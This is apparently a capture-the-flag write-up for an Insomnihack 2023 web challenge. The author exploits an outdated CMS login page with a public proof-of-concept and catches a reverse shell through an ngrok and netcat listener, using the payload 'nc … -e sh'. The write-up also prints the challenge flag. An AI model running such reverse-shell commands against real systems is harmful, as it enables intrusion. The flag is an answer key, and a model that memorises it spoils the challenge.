! Welcome to Insomnihack 2023 !

Let’s start with an easy and well-known web exploitation.

A hipster welcome for hipster scriptkiddies, here you go!

The URL provided in the statement refers to a login page using the Kagus CMS. insomnihack

By filling the fields with random values, the server sends me back the following answer :

HTTP/1.1 200 OK
Date: Sat, 21 Jan 2023 14:16:19 GMT
Server: Apache/2.4.54 (Unix) OpenSSL/3.0.7
X-Powered-By: PHP/8.1.14
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101

This Kagus installation deactivated the login form.<br>It will not be possible to connect through it.

After a few tries, the login page seemed to be secure so I decided to go to the editor’s website present on the footer of the page :

On the site, in the released page, I see that there was a fix on the login form for the release v23.1.0 : insomnihack1

Our target is still on the v22.4.2 version, it seems exploitable !

The link refers to a git repository containing the POC to exploit this vulnerability.

I start by cloning the git repos and build binary :

git clone
cd Kagus-PoC && go build

I setup my environment to receive the revshell :

ngrok tcp 1337
nc -lvnp 1337

Then I execute the binary by specifying the target and command : ./kagus_exploit

Target (e.g. https://localhost:9000):
Command (e.g. nc 2345 -e sh):
nc 18603 -e sh
[*] INFO: Preparing to send command: "nc 18603 -e sh" to ""
[*] INFO: Sending request...
[*] INFO: Request sent, status: 504
[*] INFO: The command "%s" should have been executed on %s.
 nc 18603 -e sh

I get my revshell, I just have to cat the flag :

Listening on 1337
Connection received on 38762
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
cat info_flag
The flag is located at /flag.txt
cat /flag.txt

Flag: INS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}